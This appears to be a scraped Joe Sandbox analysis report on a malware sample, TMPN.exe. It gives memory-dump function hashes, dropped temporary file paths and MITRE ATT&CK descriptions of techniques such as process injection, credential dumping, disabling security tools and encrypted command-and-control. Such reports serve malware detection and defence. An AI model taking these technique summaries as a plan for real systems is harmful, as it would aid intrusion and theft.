Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98cb11457fc9e0f1d43daa7acb8e1eb94e8dbb68a321304c27df9086eb234b5
Instruction ID: c26b0c8c7fc04ea22a612564afb0111b964f553a5b821aac99574e0f68f50739
Opcode Fuzzy Hash: a98cb11457fc9e0f1d43daa7acb8e1eb94e8dbb68a321304c27df9086eb234b5
Instruction Fuzzy Hash: 87418687B0E6D29BE352567C58F70DA7BE0DE5317570942F3C694C90A39D0C284BA2D2

Function 00007FFD3479A7F2 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7290991b592a7d778004220f96c2b3be8b5a333906587f56289cf1281295ff
Instruction ID: bde1a6322cc8a6fbb6c60b0779b80e7a54fa494980b6e6f6a4c521e0b0c03c1a
Opcode Fuzzy Hash: 7a7290991b592a7d778004220f96c2b3be8b5a333906587f56289cf1281295ff
Instruction Fuzzy Hash: 8D31C9A7A0EBC2AAE26342285CF64F63BD4DF53765B080176C794CA053AE2D2C17A552

Function 00007FFD347984FA Relevance: 6.3, Strings: 5, Instructions: 90COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD3479856A
L_^, xrefs: 00007FFD3479850A
L_^, xrefs: 00007FFD3479852A
L_^, xrefs: 00007FFD3479857A
L_^, xrefs: 00007FFD347984FA

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^
API String ID: 0-2264858084
Opcode ID: 6a8fb9009965bb50f1a67d4d359d23acfc66e2d2df062a94f695a9a99d8e7a2c
Instruction ID: b181cea18960fce5463d4930e80d001e7c2cc818fab4abf0389d776dfa350d27
Opcode Fuzzy Hash: 6a8fb9009965bb50f1a67d4d359d23acfc66e2d2df062a94f695a9a99d8e7a2c
Instruction Fuzzy Hash: 15312592B1DAC25BD393462948B509A7FE4AE1332471E11F7C2D9D70A3ED1D780BA252

Analysis Process: powershell.exePID: 6320, Parent PID: 2244COMMON

Executed Functions

Function 00007FFD348717D9 Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2383540466.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffd34870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b296bae3fe94e434cec7735d3c159cb578de5b7fa957e677ccdc38ee381ae9c3
Instruction ID: d99d8f55f976fe4068bcbf6b6aa1f442117e68d99000d9c46846f4b16c920442
Opcode Fuzzy Hash: b296bae3fe94e434cec7735d3c159cb578de5b7fa957e677ccdc38ee381ae9c3
Instruction Fuzzy Hash: 5C323722B0DB894FE7A69B2858B51B57FE1EF47210B0841FFD18DC7293E91CA806E341

Function 00007FFD347A44FB Relevance: .9, Instructions: 877COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2381326595.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ebe74e4a9e05de36c6fd42a297299d0595679d9463dd101a00f3bfdc9c5361f
Instruction ID: 1d108781d0e6c35dc181ff347b055cb3756bbe1fd7ae30d57a41b4ba740df537
Opcode Fuzzy Hash: 0ebe74e4a9e05de36c6fd42a297299d0595679d9463dd101a00f3bfdc9c5361f
Instruction Fuzzy Hash: 72C1F372A0E6858FD746DB6CD8E50E97FB0EF47214B0901BBC189D7293DE296807CB91

Function 00007FFD34870AA4 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2383540466.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffd34870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60feb9e3ca09f46032f02577dfb2c364aafbb66c3ffe9ad4ace7cf4b6a3e4229
Instruction ID: 8870c913de0aba680de8801d81b0a4fda36cf7ff35ef58ae4b15e7bbf72ace6a
Opcode Fuzzy Hash: 60feb9e3ca09f46032f02577dfb2c364aafbb66c3ffe9ad4ace7cf4b6a3e4229
Instruction Fuzzy Hash: 7A21E323B0DA590FEBA1975C6CB52B8BBD0EB56264F1841BBC20DD3193DD0CEC45A381

Function 00007FFD347A3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2381326595.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffd347a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 7d30c608dc5fc945c0f42e69edd01d182e8dec87fe7e4054c1bfd2e37747d8d1
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 4001677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3651D636E881CB45

Analysis Process: SecurityHealthSystray.exePID: 4920, Parent PID: 4004COMMON

Executed Functions

Function 0086E5A0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2252256294.0000000000801000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00800000, based on PE: true

Associated: 00000011.00000002.2251925266.0000000000800000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2257156402.00000000010E2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2257799784.00000000010EA000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2257974588.00000000010EB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2258314489.00000000010EF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2259348268.00000000010F4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2260857395.00000000010F6000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261338049.00000000010F7000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261412691.00000000010F8000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261473220.0000000001108000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261528429.000000000110B000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261589178.0000000001128000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261663905.0000000001138000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261971745.000000000113C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262021805.000000000113E000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.0000000001154000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.0000000001176000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.00000000011DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.00000000011E3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262349017.00000000011E9000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262349017.0000000001310000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2263613237.0000000001615000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2263686910.0000000001616000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_SecurityHealthSystray.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
Instruction ID: 158001cc7b953dd8e94ce4bba4247b92e012d837d03a02f52e6adb8109bb5862
Opcode Fuzzy Hash: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
Instruction Fuzzy Hash: 47319C2791CFC482D3218B24F5413AAB364F7A9784F15A715EFC852A1ADF38E2E5CB40

Function 0086A8C0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2252256294.0000000000801000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00800000, based on PE: true

Associated: 00000011.00000002.2251925266.0000000000800000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2257156402.00000000010E2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2257799784.00000000010EA000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2257974588.00000000010EB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2258314489.00000000010EF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2259348268.00000000010F4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2260857395.00000000010F6000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261338049.00000000010F7000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261412691.00000000010F8000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261473220.0000000001108000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261528429.000000000110B000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261589178.0000000001128000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261663905.0000000001138000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2261971745.000000000113C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262021805.000000000113E000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.0000000001154000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.0000000001176000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.00000000011DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262081479.00000000011E3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262349017.00000000011E9000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2262349017.0000000001310000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2263613237.0000000001615000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000011.00000002.2263686910.0000000001616000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_SecurityHealthSystray.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
Instruction ID: 644aeb84d699aba68030a99b0aef00446998cec4c6fadf429ca4cad4721b828e
Opcode Fuzzy Hash: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TMPN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.0.cs

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.dll

C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.out

C:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP

C:\Users\user\AppData\Local\Temp\ImU8tE4J8P\Display (1).png

C:\Users\user\AppData\Local\Temp\RESEB20.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cyuogn.wyc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30mqm2nj.wc4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45mpw0ck.nne.ps1

Windows Analysis Report
TMPN.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre